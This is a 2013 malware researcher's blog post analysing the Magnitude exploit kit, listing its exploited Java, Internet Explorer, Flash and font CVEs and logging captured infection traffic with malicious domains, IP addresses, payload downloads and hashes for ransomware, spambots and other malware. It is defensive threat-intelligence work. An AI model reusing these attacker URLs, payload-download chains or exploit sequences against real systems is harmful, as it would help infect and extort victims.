2013-10-26 - Study

Magnitude EK : Pop Pop !

Magnitude


Magnitude is a community  name choosen for an Exploit Kit previously referred to as "Popads".
Why Popads ?

Many days after it was first spotted, the driveby was being done using Malvert pushed via PopAds
And all landing were ending with popads.com

Magnitude 2013-03-22
Here referer : sweerl.biz

PopAds being a legit company fighting against malverts, we had to choose a proper name.

As we don't know its real name (if one), a video proposed by Will Metcalf from Emerging Threats made a consensus

Community - Magnitude (Pop pop!)

(link : http://www.youtube.com/watch?v=q-_4mcYsQdE )

Since Paunch's Arrest we are seing more and more Magnitude.

User on an Underground Forum seeking for Magnitude (^^) to grow his botnet
The world upside down.
I would rank it 2nd in term of users (Behind Neutrino, and before Kore and Nuclear Pack)

Now let's see how it's "weaponized".
Disclaimer : as usual I may hide information on stuff that seems broken.

CVE-2013-2463 with click2play bypass :

Spotted inside 2013-10-19 but was maybe there since 1 or 2 weeks.
CVE-2013-2463 + c2p bypass in Magnitude 2013-10-25
After that the computer is...slightly infected.
GET http://khncudlm.7rahdeqi .info/?7186035589665d9b107f00af07370800=v12&ed37c4cb4cd2b288135b06da53053859=[fakeUpperReferer].com&0e26f8b9e160a8b0e6176ce00d16f5db=[redacted].com
200 OK (text/html)

Magnitude Landing - Highlighted : the piece of code that won't be  404
rejected (UA based) with the configuration presented to the EK


GET http://khncudlm.7rahdeqi.info/80560ef3eddd08c9d455d41af5ea8592/cc84e758a3b4611de79628ee89895e13.swf
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/131548a8413b7f63f89dff19f8563a5e
200 OK (text/html) (this is for CVE-2013-2551 see later)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/28322e8e52bc381204f0b1e65c40e174
200 OK (text/html)


jnlp for Click2Play Bypass on jre17u21


GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/0f924936b800ba82b17b2085bfd53753.jar
200 OK (application/x-java-archive) 1c3d690421a56c5c67e211d747df9b72

Piece of CVE-2013-2463 in Magnitude Jar


GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/0f924936b800ba82b17b2085bfd53753.jar
200 OK (application/x-java-archive)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/0
200 OK (text/html) Payload 1 c2a974e04298b557f976818200c879ab Stitur Ransomware

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/u.class
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/u.class
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/1
200 OK (text/html) Payload 2 ba923eb3b0968a58a090db1e3079080d <- Redyms. Thx Kimberly (Stopmalvertising).

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/2
200 OK (text/html) Payload 3 f577eef07ef8331311f93fe1918c6cc6 Kelihos Spambot/loader

(Out of scope -- do : 
85.255.57.253
GET /cuper02.exe HTTP/1.0 --> 004874bb466e6b8eb3dd7b09f7e3855d )

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/3
200 OK (text/html) Payload 4 (empty)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/4
200 OK (text/html) Payload 5 4903405b85b5584fa93a1e4591b80f64 Zaccess

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/5
200 OK (text/html) Payload 6 818f9ea202ce30645d2fb547ff1829f8 Vawtrak (Thx @virtualalloc for the information)


Note : 5 payloads...among which a Ransomware...not sure beneficiary(ies) of the other payloads would appreciate as after Ransomware computer goes for cleaning. Explanation ? I would say the owner of this Magnitude thread is selling loads for same traffic to different customers/affiliates.

CVE-2011-3402 :

The CVE is inside (see below) but couldn't get it to fire as it's overlaping with CVE-2013-2551.
Have some idea to trigger it. Will maybe update later.


CVE-2012-0507 :


I made the pass on the "ru8080" thread.  (Ex : /news/ BH EK )

CVE-2012-0507 Pass in Magnitude
So I was expecting a ZeusGameOver (Zeus P2P)...nada. Strange.....

GET http://ilkbxnmtce.1deepinsget .info/?e15023ac04e9f62ad61f23a2439a9b1e=29
200 OK (text/html)

Magnitude Landing - 2013-10-25
Highlighted the code that won't UA 404.
(3 jar call (?) <embed> - Firefox - <object> IE <applet> has been deprecated )


GET http://ilkbxnmtce.1deepinsget .info/ff498283b05fd88b573e0cce15b22de5.eot
200 OK (application/vnd.ms-fontobject) CVE-2011-3402 <--

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/09c164f4b0f930b8c10c476ec5dbfbec.swf
404 Not Found (text/html)

GET http://ilkbxnmtce.1deepinsget.info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/8cc36c1a70beae826a15bb7df6ab5b1d
200 OK (text/html) CVE-2013-2551 (see later)

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/594ce31549c12857a01c64d38c91007c
200 OK (application/x-java-archive) b075fbbe5e96e73a9a597062d6c01444


Piece of CVE-2012-0507 in Magnitude Jar


GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/594ce31549c12857a01c64d38c91007c
200 OK (application/x-java-archive)

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/0
200 OK (text/html) Payload 1 148ae098e23c4844ce25990643cc4150 Stitur

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/1
200 OK (text/html) Payload2 empty

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/2
200 OK (text/html) Payload3 empty

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/3
200 OK (text/html) Payload4 empty

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/4
200 OK (text/html) Payload 5 07b8dafe506e56a40527b96722bf5c70

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/5
200 OK (text/html) Payload 6 empty

CVE-2013-2551 :

Inside since 2013-10-06

First time i saw it, once decoded, it was copy paste of the code from HiMan EK (the kaf() function  in HiMan  got my attention for some reasons).

I won't spend much time on that one.

CVE-2013-2551 successful pass in Magnitude - 2013-10-25


GET http://tpwqihdqrb.2deepinsget .info/?103cacc2431cf5b7bec74b56d3a60444=n11&2550a61eab180c8cfd230ffc41bf33ee=google.com&26f72647ceaa00ff4e35ed5ee16cf9fa=[redacted].com
200 OK (text/html)

Magnitude Landing 2013-10-25
Highlighted the code that will fire in this pass


GET http://tpwqihdqrb.2deepinsget .info/8eab366e152f633afc4eede350c2f657/13cd72e17e6b22c976eeba91c2ab577a.swf
404 Not Found (text/html)

GET http://tpwqihdqrb.2deepinsget .info/8eab366e152f633afc4eede350c2f657/6f1ed403773ad2b9dd44dc0fbcefadef
200 OK (text/html)

Piece of CVE-2013-2551 in Magnitude 2013-10-25


GET http://5.79.85 .237/?eade56046ab80efc3a5dd1dd83f78258
200 OK (text/html) Payload 1 : df1ada88e40a58da18dc4b408600e0a5 Winwebsec

(OT: do : 219.235.1.127 GET /api/dom/no_respond/?ts=8aad4fca6d94d7b467bbaed2d1747d2e5a1cb210&token=sysdocx1&group=asp&nid=264D4000&lid=0058&ver=0058&affid=76900&dx=0 HTTP/1.1  <--  FakeAV : Winwebsec )

GET http://5.79.85 .237/?4c9a37a894f9cee76c89df68f4c18615
200 OK (text/html) Payload 2 : 4b9c8466cae1da89923ac89eca79db2a (Kelihos Spambot)

GET http://5.79.85 .237/?8dc8e224de9248e8e1cb72ceac8a5599
200 OK (text/html) Payload 3 : 2188d6a0d622d23a9c9bb7208a9f388c (Kelihos Spambot ..again (?!?) )

GET http://5.79.85 .237/?28847bf8f7c082fcd967ac01dbaec03e
200 OK (text/html) Payload 4 (empty)

GET http://5.79.85 .237/?cf20e7e042371ed8b65339bbd931e8b3
200 OK (text/html) Payload 5 : 0ac65603f3519ac09187b35df203905f Zaccess

GET http://5.79.85 .237/?ac339e60d0e6eeb0e5a1caa4d11c2fe5
200 OK (text/html) Payload 6 (empty)

(In some configuration you can get the Java call...but most of the time you'll have an IE crash before)

CVE-2013-0634 (?) :

If so inside since at least 2013-03-22

CVE-2013-0634 (?) CVE Path




GET http://vedktnyo.3deepinsget
.info/?c372e0cf1d9e9ec9b56349796a1ceb22=34
200 OK (text/html)



GET http://vedktnyo.3deepinsget .info/12db6830c13debce138ba17130b7115a/100b9090c5f6d6577b33fb8ece0c4d45.swf
200 OK (application/x-shockwave-flash) 3f4261ccc6edb559e623906472d5cd2f So CVE-2013-0634 (?)...Can't figure this out for sure. Help would be greatly appreciated :)
Sample and Associated Fiddler (Owncloud)

GET http://vedktnyo.3deepinsget .info/12db6830c13debce138ba17130b7115a/882173c54e09bf0968cbda6b32c1d145
200 OK (text/html) CVE-2013-2551 (see before)

GET http://gabetiznol .info/calculator.exe
200 OK (text/html) aeaf204a9e5e6dd55d2a85ae1b7a0dd1 

------
Off Topic Payload :

74.86.20.50 http://twinkcam .net/images/s.php?id=92.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
36351 | 74.86.0.0/16 | SOFTLAYER | US | SOFTLAYER.COM | SOFTLAYER TECHNOLOGIES INC.

216.17.105.36 http://cinnamyn .com/images/s.php?id=92.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

30266 | 216.17.104.0/21 | A1COLO-COM | US | A1COLO.COM | A1COLO.COM
74.86.20.50 http://saggerboy .com/twg/b.php?id=92.1
User-Agent: Mozilla

Want to know more? S!ri's posts about it
--------

<edit1 2013-11-07>
After around 8 hours of maintenance where thread link were replying with a "stoptraff" Magnitude is back with small changes.

Magnitude Landing change on 2013-11-07
</edit1>

Exploitation Graph :


Magnitude Exploitation Graph
2013-10-26
To simplify : No plugin-detect. Your browser is being told to gather all the bullets...those that does not fit (User-Agent server side check) are then refused to him.

<edit 2014-02-06>  "I may hide information on stuff that seems broken" CVE-2013-0634 was only a downloader. Couldn't figure out if owner was aware and tricked by an hypothetical hired coder...so decided to hide that to avoid helping</edit>

Thanks : Chris Wakelin and Will Metcalf

Post Publication Reading by Spiderlabs :

1st Magnitude blog: http://blog.spiderlabs.com/2014/08/a-peek-into-the-lions-den-the-magnitude-aka-popads-exploit-kit.html

2nd Magnitude blog on the Backend Infrastructure Insight I: http://blog.spiderlabs.com/2014/08/magnitude-exploit-kit-backend-infrastructure-insight-part-i.html

3rd Magnitude blog on the Backend Infrastructure Insight II: http://blog.spiderlabs.com/2014/11/magnitude-exploit-kit-backend-infrastructure-insight-part-ii.html

4th Magnitude blog on the Backend Infrastructure Insight III: http://blog.spiderlabs.com/2014/12/magnitude-exploit-kit-backend-infrastructure-insight-part-iii.html

EXPLOIT-KIT
CVE-2013-2463 CVE-2013-2551 Magnitude CVE-2013-0634 CVE-2012-0507 CVE-2011-3402 Popads